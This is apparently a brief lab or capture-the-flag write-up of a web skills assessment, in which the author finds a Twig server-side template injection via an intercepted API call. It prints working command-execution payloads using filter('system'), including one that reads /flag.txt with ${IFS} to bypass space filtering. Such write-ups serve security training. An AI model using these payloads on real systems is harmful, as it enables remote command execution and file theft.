Skills Assessment

and they don't give shit

We can see a normali and basic web, without injectable camp but! if we intercept the main home peticion, we can see it:

To API call, try SSRF and SSTI

Lol, i will try antoher metoh to know it is twig or jinja2 -->

Okay, is twig, now test LFI payloads -->

If we urlEncode the spaces, get us an error, we need found another metoh to put the spaces, for example delete its or use ${IFS} -->

{{['id']|filter('system')}}

{{['cat${IFS}/flag.txt']|filter('system')}}

Use ${IFS}

Last updated 12 days ago